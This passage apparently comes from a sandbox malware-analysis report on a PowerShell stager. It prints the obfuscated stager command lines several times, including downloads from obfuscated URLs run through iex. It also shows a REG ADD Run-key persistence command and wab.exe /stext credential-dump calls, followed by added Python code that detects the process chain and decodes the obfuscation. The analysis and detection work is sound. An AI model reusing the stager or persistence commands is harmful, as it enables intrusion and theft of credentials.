nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)" Jump to behavior
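The process-creation entries above form the chain that the "Wab/Wabmig Unusual Parent Or Child Processes" and "WScript or CScript Dropper" signatures fire on: wscript.exe starts powershell.exe, the 32-bit powershell.exe starts wab.exe, and wab.exe then starts cmd.exe/reg.exe (Run-key persistence), copies of itself with /stext (the NirSoft-style dump switch the WebBrowserPassView match refers to) and a dropped .vbs under wscript.exe. The checker below is an added example written for this report, not report code or a vendor rule: it encodes those relationships as rules over process-creation events and runs them on a constructed event list built from the command lines shown on this page. The event shape, rule names and the explorer.exe control event are the editor's own; the value of %Udvalgenes215% is not shown on this page and is left unexpanded.

```python
import re
from dataclasses import dataclass

# Added example, not code from the report or the sample. Rule names, the
# ProcEvent shape and the benign explorer.exe event are the editor's own.


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent image path
    image: str     # child image path
    cmdline: str   # child command line


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WAB_ODD_PARENTS = SCRIPT_HOSTS | {"powershell.exe", "cmd.exe", "mshta.exe"}
WAB_ODD_CHILDREN = SCRIPT_HOSTS | {"cmd.exe", "reg.exe", "powershell.exe"}
# REG ADD into HKCU ...\Run with an expandable-string value.
RUN_KEY_RE = re.compile(
    r"REG\s+ADD\s+(?:HKCU|HKEY_CURRENT_USER)\\Software\\Microsoft\\Windows"
    r"\\CurrentVersion\\Run\b.*?/t\s+REG_EXPAND_SZ",
    re.IGNORECASE | re.DOTALL,
)


def check_event(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches, in rule order."""
    parent, child = _basename(ev.parent), _basename(ev.image)
    cmd = ev.cmdline.lower()
    hits = []
    if parent in SCRIPT_HOSTS and child == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    if child == "wab.exe" and parent in WAB_ODD_PARENTS:
        hits.append("wab_unusual_parent")
    if parent == "wab.exe" and child in WAB_ODD_CHILDREN:
        hits.append("wab_unusual_child")
    if parent == "wab.exe" and child == "wab.exe" and "/stext" in cmd:
        hits.append("wab_child_stext")          # NirSoft-style text dump switch
    if RUN_KEY_RE.search(ev.cmdline) and "get-itemproperty" in cmd:
        hits.append("run_key_registry_stager")  # Run value that loads code from another key
    return hits


def scan(events) -> list:
    """(rule, child image name) for every hit, in event order."""
    return [(rule, _basename(ev.image)) for ev in events for rule in check_event(ev)]


# Constructed events mirroring the chain in this report.
WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
REG_ADD = (r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" '
           r'/t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path '
           r"'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)" + '"')

SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS64,
              '"' + PS64 + '" "cls;write <obfuscated stager elided>"'),
    ProcEvent(PS32, WAB, '"' + WAB + '"'),
    ProcEvent(WAB, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\reg.exe", REG_ADD),
    ProcEvent(WAB, WAB, rf'"{WAB}" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"'),
    ProcEvent(WAB, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"'),
    ProcEvent(r"C:\Windows\explorer.exe", WAB, '"' + WAB + '"'),   # normal launch, no hit
]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:32} {image}")
```

The run-key rule deliberately keys on the command line rather than on reg.exe alone, so it fires on the cmd.exe wrapper as well as on the reg.exe child; on a real host it should be paired with a registry-value-set event for HKCU\...\Run and a look at the key the value reads from (HKCU\Fiberstof here).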
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. 
dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe Jump to behavior
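The PowerShell command lines above hide every string behind one function (the sample calls it Brandmyndighederne). `If (${host}.CurrentCulture) {$Anthranyl++}` turns the key from 0 into 1 in any normal host, `$Hawsing='SUBsTRI'; $Hawsing+='ng'` assembles the method name `Substring` at run time, and the loop `For($i=1; $i -lt $Length-$key; $i+=2)` then keeps one character out of every two. The `iex` used to run each decoded chunk is itself decoded (`$Androlepsia`) and invoked through `& ($Androlepsia)`. The decoder below is an added example written for this report, not code from the report or the sample; function and variable names are the editor's own. It is demonstrated on three short literals copied from the command line above that survived rendering intact (the User-Agent header name, the `>` delimiter and `iex`). The longer literals as reproduced on this page lose characters where runs of spaces were collapsed by rendering, so they decode to garbage here and should be decoded from the command line recovered from process-creation telemetry instead.

```python
import re

# Added example (not code from the report or the sample): reimplements the
# stager's string decoder. With key 1 the PowerShell loop keeps the
# characters at odd indices and never reads the final padding character.


def decode_interleaved(s: str, key: int = 1) -> str:
    """Mirror of the PowerShell loop:
        $n = $s.Length - $key
        for ($i = 1; $i -lt $n; $i += 2) { $out += $s.Substring($i, $key) }
    With key 1 this returns the characters at indices 1, 3, 5, ..., i.e. every
    real character, skipping the junk character in front of each one and the
    single pad character at the end of the literal."""
    limit = len(s) - key
    return "".join(s[i:i + key] for i in range(1, limit, 2))


def encode_interleaved(plain: str, junk: str = "X") -> str:
    """Inverse transform, used here only to build test data: junk, real,
    junk, real, ..., junk, then one trailing pad character that the loop
    bound (i < length - key) never reads."""
    return "".join(junk + c for c in plain) + junk + " "


# One match per `Brandmyndighederne '<literal>'` call in the command line.
CALL_RE = re.compile(r"Brandmyndighederne\s+'([^']*)'", re.IGNORECASE)


def decode_all(cmdline: str) -> list:
    """Decode every obfuscated literal handed to the decoder function."""
    return [decode_interleaved(lit) for lit in CALL_RE.findall(cmdline)]


# Constructed fragment: three literals copied from the report's command line
# that render intact (no collapsed double spaces inside them).
SAMPLE_FRAGMENT = (
    "$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';"
    "$shrugging=Brandmyndighederne 'S> ';"
    "$Androlepsia=Brandmyndighederne '.iYe.xr ';"
)

if __name__ == "__main__":
    for literal, plain in zip(CALL_RE.findall(SAMPLE_FRAGMENT), decode_all(SAMPLE_FRAGMENT)):
        print(f"{literal!r} -> {plain!r}")
```

Run against the full command line from a process-creation event (Sysmon event 1, Security 4688 with command-line auditing, or PowerShell script-block logging), `decode_all` yields the User-Agent string, the two download URLs joined by `>`, the `echo %appdata%\...` probe and the `[Net.ServicePointManager]::SecurityProtocol` assignment in the order the stager evaluates them.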
Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerE
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr Binary or memory string: [2024/07/01 10:19:54 Program Manager]
Source: wab.exe, 0000000A.00000003.1988708190.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1987753034.00000000005D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager)
Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerlesj
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 54 Program Manager]
Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerlesR
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr Binary or memory string: [2024/07/01 10:20:03 Program Manager]
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B22933 cpuid 10_2_22B22933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
